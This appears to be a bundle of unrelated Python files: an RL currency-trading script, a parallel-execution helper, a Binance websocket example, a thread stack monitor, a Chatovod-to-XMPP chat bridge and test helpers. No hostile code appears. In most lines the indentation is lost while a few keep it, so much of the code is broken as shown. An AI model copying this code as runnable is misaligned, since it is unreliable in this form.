print('End amount UAH: {:.2f}'.format(agent.amount_uah))
print('End amount USD: {:.2f}'.format(agent.amount_usd))
print('Profit in UAH: {:.2f}'.format(agent.profit))
exit_uah = agent.amount_usd * env.get_observation(env.size-1).rate_buy
exit_amount = agent.amount_uah + exit_uah
print('Amount on exit now: {:.2f}'.format(exit_amount))
return agent.profit
@hldit
def sarsa(play=False, plot_chart=False):
env = Environment()
# load smaller environment for just one month
env.load(2018)
agent = PolicyBasedTrader(policy=None, env=env)
s_S = agent.states_space_size
s_A = agent.actions_space_size
print(f'States space size is {s_S}')
print(f'Actions space size is {s_A}')
print(f'Steps in environment is {env.size}')
alpha = 1 # learning rate, discard old results immediately
gamma = 1 # discount factor
# load model from a file if saved previously
model = SarsaModel.load() if play else None
Q = model.Q if model is not None else np.zeros(shape=(s_S, s_A))
if model is not None:
print(f'Resuming with eps={model.eps}')
min_eps = 0.01
    # start with exploration, or resume epsilon from the saved model
    eps = model.eps if model is not None else 0.1
max_eps = 1.0
decay_rate = 0.05
best_fitness = -np.inf
EPOCHS = 2000
period = 5
data = []
fig, ax = plt.subplots(figsize=(6, 4))
fig.canvas.set_window_title('Agent evaluation')
def build_live_chart(i):
window = 20 # show N last values
local_data = data[-window:]
sv = (len(data) - window)*period if len(data) - window > 0 else 0
ev = len(data)*period
datax = np.arange(sv, ev, period)
plt.xlabel('Iterations')
plt.ylabel('Fitness')
plt.title('Learning curve')
ax.clear()
ax.plot(datax, local_data, 'b', label='Score')
ax.legend()
ax.grid(True)
def run_iterations():
nonlocal eps, best_fitness
print(f'Running {EPOCHS} epochs\n')
for i in range(EPOCHS):
if i % period == 0:
print(f'Evaluating agent on {i} iteration...')
fitness = evaluate_q(env, Q)
if fitness > 0:
click.secho(f'We have positive fitness {fitness:.2f}',
fg='red')
if fitness > best_fitness:
best_fitness = fitness
data.append(fitness)
# reset env for each epoch
agent = PolicyBasedTrader(policy=None, env=env)
s = 0 # starting state
a = get_next_action(agent, Q, s, eps=eps)
print(f'Rollout for epoch {i}')
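            # SARSA update: Q(s, a) += alpha * (r + gamma * Q(s', a') - Q(s, a));
            # when the episode ends (s_ is None) the bootstrap term is dropped.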
while s is not None: # rollout
r, s_ = agent.take_action(a, s)
if s_ is not None:
a_ = get_next_action(agent, Q, s_, eps=eps)
q_update = alpha * (r + gamma*Q[s_, a_] - Q[s, a])
else:
q_update = alpha * (r - Q[s, a])
a_ = None
Q[s, a] += q_update
s = s_
a = a_
eps = min_eps + (max_eps - min_eps)*np.exp(-decay_rate*i)
ani = animation.FuncAnimation(fig, build_live_chart, interval=500)
t = threading.Thread(target=run_iterations)
t.start()
plt.show()
t.join()
# Save latest data
if not play:
model = SarsaModel(Q=Q, eps=eps)
model.save()
print('\nDone!')
click.secho(f'Best fitness {best_fitness:.2f}', fg='green')
policy = extract_policy(agent, Q)
if plot_chart:
build_evaluation_chart(data, period=period)
return policy
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--play',
action='store_true',
default=False,
help='use saved model just to evaluate an agent',
)
parser.add_argument(
'--chart',
action='store_true',
default=True,
help='build full evaluation chart in the end',
)
return parser.parse_args()
def main():
args = parse_args()
sarsa(play=args.play, plot_chart=args.chart)
evaluate_agent()
if __name__ == '__main__':
main()
|
util.py
|
import math
import os, pickle
import random
import copy
import time
import numpy as np
import settings
from warnings import warn
def get_pairwise_distance_mudra(r):
pair_dis = np.abs(r - r[:, None])
pair_dis = np.reshape(pair_dis,len(r)*len(r))
pair_dis.sort()
pair_dis = pair_dis[len(r):]
return np.mean(pair_dis)
def get_gene_sequence(gene_name):
try:
gene_file = settings.seq_dir_template.format(gene_name=gene_name)
with open(gene_file, 'rb') as f:
seq = f.read()
seq = seq.replace('\r', '')
seq = seq.replace('\n', '')
except:
raise Exception("could not find gene sequence file %s, please see examples and generate one for your gene as needed, with this filename" % gene_file)
return seq
def get_or_compute(file, fargpair, force_compute=False):
try:
if os.path.exists(file) and not force_compute:
print "from get_or_compute reading cached pickle", file
with open(file, 'rb') as f:
return pickle.load(f)
else:
print "from get_or_compute recomputing pickle cache", file
except Exception as e:
# TODO: catch pickle failure error
warn("Failed to load %s" % file)
warn("Recomputing. This may take a while...")
result = fargpair[0](*fargpair[1])
with open(file, 'wb') as f:
pickle.dump(result, f)
return result
def to_temp(name, object):
filename = settings.pj(settings.tmpdir, name + ".pkl")
with open(filename, "wb") as f:
pickle.dump(object, f)
def from_temp(name):
filename = settings.pj(settings.tmpdir, name + ".pkl")
with open(filename, "rb") as f:
return pickle.load(f)
def execute_parallel(farg_pairs, num_procs=None, verbose=False):
# see https://blog.ionelmc.ro/2014/12/21/compiling-python-extensions-on-windows/
from multiprocess import Process, Queue, cpu_count
if num_procs is None:
# leave 25%
num_procs = math.ceil(cpu_count()*.75)
print "using %d procs in execute parallel" % num_procs
processes = []
q = None
results = []
q = Queue()
num_jobs = len(farg_pairs)
if verbose:
print "execute_parallel num_procs=%d, num_jobs=%d" % (num_procs, num_jobs)
i = -1
farg_pair = None
farg_pairs = copy.copy(farg_pairs)
while len(farg_pairs) > 0:
farg_pair = farg_pairs.pop(0)
i += 1
if verbose:
print "running job", i
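        # target_func closes over the current i / farg_pair; this is safe
        # because the worker process is started (and the closure captured)
        # before the loop rebinds them on the next iteration.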
def target_func(*args, **kwargs):
q.put((i, farg_pair[0](*args, **kwargs)))
if len(farg_pair) > 1:
p = Process(target=target_func, args=farg_pair[1])
else:
p = Process(target=target_func)
p.start()
processes.append(p)
# wait until we drop below num_procs
while len(processes) >= num_procs:
len1 = len(results)
results.append(q.get())
if len1 != len(results):
for j, p in enumerate(processes):
if p.exitcode is not None:
p.join()
break
processes = processes[:j] + processes[j+1:]
else:
time.sleep(0.01)
while len(results) < num_jobs:
results.append(q.get())
time.sleep(0.01)
assert len(results) == num_jobs
# join remaining processes before exiting
for i, p in enumerate(processes):
p.join()
results = zip(*sorted(results, key=lambda x: x[0]))[1]
return results
if __name__ == "__main__":
def test(t, v):
time.sleep(random.randint(1, 4))
return t, v
commands = []
for i in range(11):
v = random.randint(0, 1000)
commands.append((test, (i, v)))
a = execute_parallel(commands, num_procs=None, verbose=True)
b = map(lambda x: x[1], commands)
print a
print b
assert tuple(a) == tuple(b)
|
example_binance_jex.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_binance_jex.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2020, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
        if oldest_stream_data_from_stream_buffer is False:
            time.sleep(0.01)
        else:
            print(oldest_stream_data_from_stream_buffer)
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
# create instance of BinanceWebSocketApiManager for Binance Jersey
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="jex.com")
# set api key and secret for userData stream
binance_jex_api_key = ""
binance_jex_api_secret = ""
binance_websocket_api_manager.set_private_api_config(binance_jex_api_key, binance_jex_api_secret)
userdata_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!userData"])
ticker_all_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!optionMiniTicker"])
miniticker_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!spotMiniTicker"])
spot_ticker_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!spotTicker"])
spot_markets = {'eosbtc', 'ltcbtc', 'ethbtc', 'dashbtc'}
spot_channels = {'spotTrade', 'spotMiniTicker', 'spotDepth20', 'spotDepthUpdate', 'spotTicker'}
binance_websocket_api_manager.create_stream(["spotTrade"], spot_markets)
binance_websocket_api_manager.create_stream(["spotDepth10"], spot_markets)
binance_websocket_api_manager.create_stream(["spotDepth20"], spot_markets)
binance_websocket_api_manager.create_stream(spot_channels, spot_markets)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# show an overview
while True:
binance_websocket_api_manager.print_summary()
#binance_websocket_api_manager.print_stream_info(userdata_stream_id)
time.sleep(1)
|
stacksurveillance.py
|
"""
Class to watch the calling thread and report what it's doing.
https://stackoverflow.com/questions/45290223/check-what-thread-is-currently-doing-in-python
"""
import threading
import sys
import time
class StackSurveillance:
    def __init__(self, thread=None, file=sys.stderr, interval=60.0, callback=None):
        # Resolve the default here rather than in the signature, so the watched
        # thread is determined at call time instead of class-definition time.
        self.thread = thread if thread is not None else threading.current_thread()
        self.file = file
        self.interval = interval
        self.callback = callback
        self.t = threading.Thread(target=self.run, daemon=True)
        self.t.start()
    def run(self):
        while True:
            frame = sys._current_frames().get(self.thread.ident, None)
            if frame:
                print(frame, file=self.file)
                print(frame.f_code.co_filename, frame.f_code.co_name, frame.f_code.co_firstlineno, file=self.file)
                if self.callback is not None:
                    self.callback(frame)
            time.sleep(self.interval)
if __name__ == "__main__":
    print("demo program to show use with a slow fibonacci program.")

    def slow_fib(a):
        time.sleep(1)
        if a > 2:
            return slow_fib(a - 1) + slow_fib(a - 2)
        return 1

    # Watch the main thread and report its stack every few seconds while the
    # naive recursion grinds along.
    StackSurveillance(interval=5)
    print(slow_fib(8))
|
chatovod2xmpp.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import socket
import time
import random
import traceback
from hashlib import sha1
from base64 import b64encode, b64decode
from threading import RLock, Thread
from urllib2 import unquote, quote, urlopen
import chatovod
from pyjabberd_utilites import load_config, node_reader, jid_split, gen_error, gen_iq_result, gen_stream_stream, Node, XML2Node
class CExc(Exception): pass
class NodeProcessed(Exception): pass
host = None # init after connecting
sock = None
lock = RLock() # for socket
reader = None
deletechars="".join(chr(x) for x in range(32) if x not in (10, 13))
rooms_list = []
rooms_list_dict = {}
rooms_list_time = 0
rooms = {} # jabber
config = {
'host': 'localhost',
'server': '',
'transport_host': 'chatovod.localhost',
'port': '52220',
'password': 'secret'
}
smile_cache = {}
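# get_smile() converts a smiley image URL into a data: URI and memoises the
# result, so each emoticon is downloaded from the chat server at most once.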
def get_smile(url):
data = smile_cache.get(url)
if data: return data
try: data = urlopen(url).read()
except: return url
else:
typ = url[-4:].lower()
if typ == ".gif": typ = "image/gif"
elif typ in (".jpg", ".jpeg"): typ = 'image/jpeg'
else: typ = 'image/png'
smile_cache[url] = "data:" + typ + ";base64," + quote(b64encode(data))
return smile_cache[url]
class Room:
def __init__(self, name):
name = name.lower()
self.name = name
self.chat = chatovod.Chat(name)
self.clients = {} # jabber
self.chat_users = {} # chatovod
self.last20 = []
self.stopped = False
self.topic = None
#self.cookie = {} # joined from jabber
self.clients_timeout = time.time()
self.captcha_cache = {}
self.msg_id_cache = {}
try:
self.go(reload=True)
except:
traceback.print_exc()
self.thread = Thread(target=self.run)
self.thread.start()
def has_jabber_clients(self, jid=None):
if not jid: return bool(self.clients)
else: return self.clients.has_key(jid)
def send_last20(self, jid):
for prs in self.chat_users.values():
prs['to'] = jid
send(prs)
for msg in self.last20:
msg['to'] = jid
send(msg)
if self.topic:
msg = Node("message", {"type": "groupchat", "from": self.name+u"@"+host, "to": jid})
msg.addChild("subject").addData(self.topic)
send(msg)
def set_prs_status(self, jid, prs):
nick = self.clients.get(jid)
if not nick: return
show = prs.getTag("show")
if show: show = show.getData()
if not show: show = u"online"
status = prs.getTag("status")
if status: status = status.getData()
else: status = u""
if status:
self.chat.changestatus(nick.encode("utf-8"), status.encode("utf-8"))
return
if show in (u"away", u"xa"):
show = "AWAY"
elif show in (u"dnd", ):
show = "DND"
else:
show = "ONLINE"
self.chat.changestatus(nick.encode("utf-8"), show)
def join(self, jid, nick, prs, password=None):
if self.clients.get(jid) == nick:
self.set_prs_status(jid, prs)
return
if self.clients.get(jid): # or (nick != u"anonymous" and not password):
send(gen_error(prs, "409", "cancel", "conflict"))
return
if self.chat_users.get(nick) and self.clients.get(jid) != nick:
send(gen_error(prs, "409", "cancel", "conflict"))
return
if nick == u"anonymous":
self.clients[jid] = nick
self.send_last20(jid)
prs = Node("presence", {"type":"available", "from": self.name+u"@"+host+u"/"+nick, "to": jid})
x = prs.addChild("x")
x.setNamespace("http://jabber.org/protocol/muc#user")
x.addChild("item", {"affiliation":"none", "role": "visitor"})
send(prs)
return
cookie, result = self.chat.login(nick, password if password else "")
if result['status'] == 'ok':
self.clients[jid] = nick
self.send_last20(jid)
self.set_prs_status(jid, prs)
return
elif result['status'] == 'needpassword':
send(gen_error(prs, "401", "auth", "not-authorized"))
return
captcha = self.chat.getcaptcha(cookie=cookie)
chash = sha1(captcha).hexdigest()
cid = "sha1+" + chash + "@bob.xmpp.org"
cid = str(random.randrange(1000000,10000000))
self.captcha_cache[jid] = [nick, password, cid, cookie, prs]
msg = Node("message", {"from": self.name+u"@"+host, "to": jid, "id": cid})
msg.addChild("body").addData(u"Увы, капча")
c = msg.addChild("captcha")
c.setNamespace("urn:xmpp:captcha")
x = c.addChild("x", {"type": "form"})
x.setNamespace("jabber:x:data")
x.addChild("field", {"type": "hidden", "var": "FORM_TYPE"}).addChild("value").addData("urn:xmpp:captcha")
x.addChild("field", {"type": "hidden", "var": "from"}).addChild("value").addData(self.name+u"@"+host)
x.addChild("field", {"type": "hidden", "var": "challenge"}).addChild("value").addData(cid)
x.addChild("field", {"type": "hidden", "var": "sid"}).addChild("value")
l = x.addChild("field", {"label": u"Введите увиденный текст", "var": "ocr"})
l.addChild("required")
m = l.addChild("media")
m.setNamespace("urn:xmpp:media-element")
m.addChild("uri", {"type":"image/png"}).addData(cid)
        d = msg.addChild("data", {"cid": cid, "type": "image/png", "max-age": "0"})
d.setNamespace("urn:xmpp:bob")
d.addData(b64encode(captcha))
send(msg)
def parse_captcha_iq(self, jid, node):
if node['type'] != 'set': return
print "parse captcha"
nick, password, cid, cookie, prs = self.captcha_cache.get(jid, [None, None, None, None, None])
if not cid or not cookie or not prs: return
self.captcha_cache.pop(jid)
try:
captcha = node.getTag("captcha", {"xmlns":"urn:xmpp:captcha"})
#print unicode(captcha)
captcha = captcha.getTag("x").getTag("field", {"var":"ocr"}).getTag("value").getData()
except:
captcha = ""
print "c =", captcha
cookie, result = self.chat.login(nick, password, captcha=captcha, cookie=cookie)
if result['status'] != 'ok':
send(gen_error(prs, "406", "modify", "not-acceptable"))
send(gen_error(prs, "401", "auth", "not-authorized"))
if not self.has_jabber_clients():
kill_room(self.name)
raise NodeProcessed
#self.cookies[jid] = cookie
self.clients[jid] = nick
self.send_last20(jid)
self.set_prs_status(jid, prs)
def parse_message(self, jid, node):
if node['type'] != 'groupchat': return
nick = self.clients.get(jid)
if not nick or nick == u'anonymous': return
body = node.getTag("body")
if not body or not body.getData(): return
body = body.getData()
self.msg_id_cache[nick] = node['id']
if self.chat.send_msg(nick.encode("utf-8"), body.encode("utf-8")).get('status') == 'notlogged':
self.leave(jid, None, status=307)
def stop(self):
self.stopped = True
for jid in self.clients.keys():
self.leave(jid)
def leave(self, jid, prs=None, status=None):
nick = self.clients.get(jid)
if not nick: return
self.clients.pop(jid)
node=Node("presence", {"type": "unavailable", "to": jid, "from": self.name+u"@"+host+u"/"+nick})
if status: node.addChild("x", namespace="http://jabber.org/protocol/muc#user").addChild("status", {"code": str(status)})
send(node)
if nick != u"anonymous":
self.chat.leave(nick)
def run(self):
while 1:
if self.stopped: break
try:
self.go()
except:
traceback.print_exc()
time.sleep(1)
print "STOP", self.name
def go(self, reload=False):
#print time.time() - self.clients_timeout
if time.time() - self.clients_timeout >= 30:
#print "timeout"
for nick in self.clients.values():
if nick == u'anonymous': continue
#self.chat.changestatus(nick)
                try: self.chat.send_action(nick, "listen", reload="1") # reload=0 if used together with the previous (commented-out) line
except KeyboardInterrupt: continue
except: pass
self.clients_timeout = time.time()
data = self.chat.listen(reload)
if self.stopped: return
for item in data.get("users", []):
#print "user", item
#print
if item.get("nick") == u"anonymous":
print "WARNING!!! ANONYMOUS IN CHATOVOD!!!"
continue
if item['event'] == 'LEAVE':
if not self.chat_users.get(item['nick']): continue
self.chat_users.pop(item['nick'])
self.send_node(Node("presence", {"type": "unavailable", "from": self.name+u"@"+host+u"/"+item['nick']}))
else:
sprs = Node("presence", {"type": "available", "from": self.name+u"@"+host+u"/"+item['nick']})
x = sprs.addChild("x")
x.setNamespace("http://jabber.org/protocol/muc#user")
aff = 'owner' if item.get('adm')=='1' else ('admin' if item.get('m')=='1' else 'none')
role = 'moderator' if aff!='none' else 'participant'
x.addChild("item", {"affiliation":aff, "role": role})
if item['s'] == 'AWAY':
sprs.addChild("show").addData("away")
elif item['s'] == 'DND':
sprs.addChild("show").addData("dnd")
elif item['s'] == 'CUSTOM':
sprs.addChild("status").addData(item.get("ss", u""))
self.chat_users[item['nick']] = sprs
self.send_node(sprs)
for item in data.get('messages', []):
#print "msg", item
#print
if item.get('channel') != 'main': continue
if item.get('type') in (u'login', u'logout') or (not item.get('from') and item.get('type')!='me'):
continue
if item.get('type') == 'me':
item['from'], item['text'] = item['text'].split(" ",1)
item['text'] = u"/me " + item['text']
if item.get("from") == u"anonymous":
print "WARNING!!! ANONYMOUS IN CHATOVOD!!!"
continue
if self.msg_id_cache.get(item['from']):
mid = self.msg_id_cache.pop(item['from'])
else:
mid = str(random.randrange(10000,100000))
msg = Node('message', {
'type':'groupchat',
'from': self.name+u"@"+host+u"/"+item['from'],
'id': mid
})
body = None
try:
#if "<" in item['text'] :
body = XML2Node("<body>"+item['text'].encode("utf-8")+"</body>")
except:
print "cannot parse text", self.name
#body = Node('body')
#body.addData(item['text'])
if body:
body.setNamespace("http://www.w3.org/1999/xhtml")
if body:
text_body = u""
for x in body.getPayload():
if not x: continue
if isinstance(x, unicode): text_body += x; continue
if x.getName() == 'br': text_body += u'\n'
elif x.getName() == 'img' and x['src']:
if 'chatovod.ru' in x['src'] and '/i/sm/' in x['src'] :
text_body += u' ' + x['alt'] + u' '
x['src'] = get_smile(x['src'])
else:
text_body += u' ' + x['src'] + u' ' + ((u'(' + x['alt'] + ') ') if x['alt'] else u'')
x['onload'] = u''
elif x.getName() == 'a' and x['onclick'] and '/media/?url=' in x['onclick']:
url = x['onclick'].split("/media/?url=",1)[-1].split("'",1)[0]
url = unquote(url)
text_body += url
x.setData(url)
x['src'] = url
else: text_body += x.getCDATA()
else:
text_body = item['text']
#if item.get('type') == 'me' and text_body.find(item['from']+u" ") == 0:
# text_body = u"/me "+text_body[len(item['from'])+1:]
msg.addChild('body').addData(text_body)
if body:
html = msg.addChild('html')
html.setNamespace("http://jabber.org/protocol/xhtml-im")
html.addChild(node=body)
self.send_node(msg)
tm = time.gmtime(int(item.get('t', 0))/1000)
tm1 = time.strftime("%Y-%m-%dT%H:%M:%SZ", tm)
tm2 = time.strftime("%Y%m%dT%H:%M:%S", tm)
msg.addChild("delay", {"from": self.name+u"@"+host, "stamp": tm1}).setNamespace("urn:xmpp:delay")
msg.addChild("x", {"stamp": tm2}).setNamespace("jabber:x:delay")
self.last20.append(msg)
if len(self.last20) > 20:
self.last20 = self.last20[-20:]
for item in data.get("events", []):
#print "event", item
#print
if item.get('t') != 'news': continue
body = item['text']
try:
if "<" in body:
body = XML2Node("<body>"+body.encode("utf-8")+"</body>")
body = body.getCDATA()
except:
print "cannot parse event text", self.name
self.topic = body if body else None
msg = Node("message", {"type": "groupchat", "from": self.name+u"@"+host})
msg.addChild("subject").addData(self.topic if self.topic else "")
self.send_node(msg)
def send_node(self, node):
for send_jid in self.clients.keys():
node['to'] = send_jid
send(node)
def create_room(name):
room = Room(name)
rooms[name] = room
print "CREATE", name
return room
def kill_room(name):
room = rooms.get(name)
if not room: return
room.stop()
rooms.pop(name)
print "KILL", name
def get_rooms_list(please_dict=False):
global rooms_list, rooms_list_time, rooms_list_dict
if int(time.time()) - rooms_list_time < 30:
return rooms_list_dict if please_dict else rooms_list
rooms_list = []
rooms_list_dict = {}
rooms_list_time = int(time.time())
for i in xrange(10):
crooms = chatovod.get_rooms_list(i+1)
if not crooms: break
for croom in crooms:
f=croom[0].rfind(".chatovod.ru/")
if f <= 0: continue
name = croom[0][:f] + "@" + host
name = name[name.rfind("/")+1:]
title = croom[1].encode("utf-8") + " (" + str(croom[2]) + ")"
rooms_list.append( (name, title,) )
rooms_list_dict[name] = (croom[1].encode("utf-8"), croom[2])
return rooms_list_dict if please_dict else rooms_list
def socket_read():
global sock
return sock.recv(4096)
def read():
global reader
return reader.next()
def send(data):
global sock, lock
with lock:
if not isinstance(data, str):
data = unicode(data).encode("utf-8")
return sock.sendall(data.translate(None, deletechars))
def connect():
global config, sock, reader, host
sock = socket.socket()
server = config.get('server')
if not server: server = config['host']
sock.connect( (server, int(config['port']),) )
reader = node_reader(socket_read)
send(gen_stream_stream(config['host'], 'jabber:component:accept'))
node = read()
if node.getName() != "stream":
print unicode(node)
raise CExc("Invalid stanza")
sid = node['id']
shash = sha1(str(sid) + config['password']).hexdigest()
handshake = Node("handshake")
handshake.addData(shash)
send(handshake)
node = read()
if node.getName() != 'handshake':
if node.getName() == 'error':
raise CExc(node.getChildren()[0].getName())
print unicode(node)
raise CExc("Invalid stanza")
host = config['transport_host'].decode("utf-8")
def process():
node = read()
try:
parse_node(node)
except NodeProcessed: pass
except KeyboardInterrupt: raise
except:
try:
#print unicode(node)
#print
#print unicode(gen_error(node))
send(gen_error(node))
except:
traceback.print_exc()
raise
def parse_node(node):
if node.getName() == "iq":
if node['to'] == host: parse_my_iq(node)
else: parse_iq(node)
if node['type'] in ('get', 'set'):
send(gen_error(node, "501" ,"cancel", "feature-not-implemented"))
elif node.getName() == "presence":
if node['to'] == host: pass
else: parse_presence(node)
elif node.getName() == "message":
if node['to'] == host: pass
else: parse_message(node)
def parse_message(node):
if node['type'] == 'error': return
jid, resource = jid_split(node['to'])
#node['to'] = jid
name = jid[:jid.find("@")].encode("utf-8")
#TODO: fix xmlns=jabber:component:accept
#send(gen_error(node, "403", "auth", "forbidden", text="Сообщения не поддерживаются", childs=True))
if not resource:
room = rooms.get(name)
if room: room.parse_message(node['from'], node)
def parse_presence(node):
if node['type'] == 'error': return
jid, resource = jid_split(node['to'])
#node['to'] = jid
name = jid[:jid.find("@")].encode("utf-8")
room = rooms.get(name)
if room:
#joined = rooms[name].clients.has_key(node['from'])
joined = rooms[name].has_jabber_clients(node['from'])
else:
joined = False
if not joined and not resource: return
passwd = node.getTag("x", {"xmlns": "http://jabber.org/protocol/muc"})
if passwd: passwd = passwd.getTag("password")
if passwd: passwd = passwd.getData()
if not room:
if node['type'] == 'unavailable':
return
try: room = create_room(name)
except chatovod.ChatovodError:
send(gen_error(node, "404", "cancel", "remote-server-not-found"))
return
if node['type'] == 'unavailable':
room.leave(node['from'], node)
if not room.has_jabber_clients():
kill_room(name)
else:
room.join(node['from'], resource, prs=node, password=passwd)
def parse_my_iq(node):
query = node.getTag("query")
if not query:
return
if query.getNamespace() == "http://jabber.org/protocol/disco#info":
rquery = Node("query")
rquery.setNamespace("http://jabber.org/protocol/disco#info")
rquery.addChild("identity", {"category": "conference", "type": "text", "name": "Chatovod"})
send(gen_iq_result(node, rquery))
raise NodeProcessed
elif query.getNamespace() == "http://jabber.org/protocol/disco#items":
rquery = Node("query")
rquery.setNamespace("http://jabber.org/protocol/disco#items")
crooms = get_rooms_list()
for croom in crooms:
rquery.addChild("item", {"name": croom[1], "jid": croom[0]})
send(gen_iq_result(node, rquery))
raise NodeProcessed
def parse_iq(node):
jid, resource = jid_split(node['to'])
name = jid[:jid.find("@")].encode("utf-8")
#print name, resource
if not resource: # for chat
if node.getTag("captcha"):
#print "p c"
room = rooms.get(name)
#print "r", room
if not room: return
room.parse_captcha_iq(node['from'], node)
return
query = node.getTag("query")
if not query:
return
if query.getNamespace() == "http://jabber.org/protocol/disco#info":
rquery = Node("query")
rquery.setNamespace("http://jabber.org/protocol/disco#info")
croom = get_rooms_list(please_dict=1).get(name, ("", 0))
rquery.addChild("identity", {"category": "conference", "type": "text", "name": croom[0]})
rquery.addChild("feature", {"var": "http://jabber.org/protocol/muc"})
rquery.addChild("feature", {"var": "muc_public"})
rquery.addChild("feature", {"var": "muc_persistent"})
rquery.addChild("feature", {"var": "muc_moderated"})
rquery.addChild("feature", {"var": "muc_unsecured"})
x = rquery.addChild("x", {"type": "result"})
x.setNamespace("jabber:x:data")
x.addChild("field", {"type": "hidden", "var": "FORM_TYPE"}).addChild("value").addData("http://jabber.org/protocol/muc#roominfo")
x.addChild("field", {"label": "Описание комнаты", "var": "muc#roominfo_description"}).addChild("value")
x.addChild("field", {"label": "Число присутствующих", "var": "muc#roominfo_occupants"}).addChild("value").addData(str(croom[1]))
send(gen_iq_result(node, rquery))
raise NodeProcessed
elif query.getNamespace() == "http://jabber.org/protocol/disco#items":
rquery = Node("query")
rquery.setNamespace("http://jabber.org/protocol/disco#items")
room = rooms.get(name)
if room:
for cuser in room.chat_users.keys():
rquery.addChild("item", {"name": cuser, "jid": name+'@'+host+"/"+cuser})
send(gen_iq_result(node, rquery))
raise NodeProcessed
def shutdown():
global host, sock, reader
for name in rooms.keys():
kill_room(name)
with lock:
host = None
sock = None
reader = None
def main(run=0):
if run == 0: load_config(config=config)
connect()
print "Connected"
get_smile(u"http://st1.chatovod.ru/i/sm/icon_smile.gif")
get_smile(u"http://st1.chatovod.ru/i/sm/icon_biggrin.gif")
get_smile(u"http://st1.chatovod.ru/i/sm/lol1.gif")
try:
while 1:
try:
process()
except StopIteration:
print "Disconnected!"
shutdown()
time.sleep(1)
return "reload"
except KeyboardInterrupt: raise
except CExc as exc: raise
except:
traceback.print_exc()
finally:
shutdown()
if __name__ == "__main__":
try:
run=0
while main(run) == "reload":
print "Restarting..."
run+=1
except KeyboardInterrupt:
print
except CExc as exc:
print "Error:", str(exc)
|
test_utils.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generic helper functions useful in tests."""
import atexit
import datetime
import os
import requests
import shutil
import socket
import subprocess
import tempfile
import threading
import unittest
from config import local_config
from datastore import data_types
from datastore import ndb
from google_cloud_utils import pubsub
from issue_management.comment import Comment
from issue_management.issue import Issue
from system import environment
from system import process_handler
CURRENT_TIME = datetime.datetime.utcnow()
EMULATOR_TIMEOUT = 20
# Per-process emulator instances.
_emulators = {}
def create_generic_testcase(created_days_ago=28):
"""Create a simple test case."""
testcase = data_types.Testcase()
# Add more values here as needed. Intended to be the bare minimum for what we
# need to simulate a test case.
testcase.absolute_path = '/a/b/c/test.html'
testcase.crash_address = '0xdeadbeef'
testcase.crash_revision = 1
testcase.crash_state = 'crashy_function()'
testcase.crash_stacktrace = testcase.crash_state
testcase.crash_type = 'fake type'
testcase.comments = 'Fuzzer: test'
testcase.fuzzed_keys = 'abcd'
testcase.fuzzer_name = 'fuzzer1'
testcase.open = True
testcase.one_time_crasher_flag = False
testcase.job_type = 'test_content_shell_drt'
testcase.status = 'Processed'
testcase.timestamp = CURRENT_TIME - datetime.timedelta(days=created_days_ago)
testcase.project_name = 'project'
testcase.platform = 'linux'
testcase.put()
return testcase
def create_generic_issue(created_days_ago=28):
"""Returns a simple issue object for use in tests."""
issue = Issue()
issue.cc = ['cc@chromium.org']
issue.comment = ''
issue.comments = []
issue.components = ['Test>Component']
issue.labels = ['TestLabel', 'Pri-1', 'OS-Windows']
issue.open = True
issue.owner = 'owner@chromium.org'
issue.status = 'Assigned'
issue.id = 1
issue.itm = create_issue_tracker_manager()
# Test issue was created 1 week before the current (mocked) time.
issue.created = CURRENT_TIME - datetime.timedelta(days=created_days_ago)
return issue
def create_generic_issue_comment(comment_body='Comment.',
author='user@chromium.org',
days_ago=21,
labels=None):
"""Return a simple comment used for testing."""
comment = Comment()
comment.comment = comment_body
comment.author = author
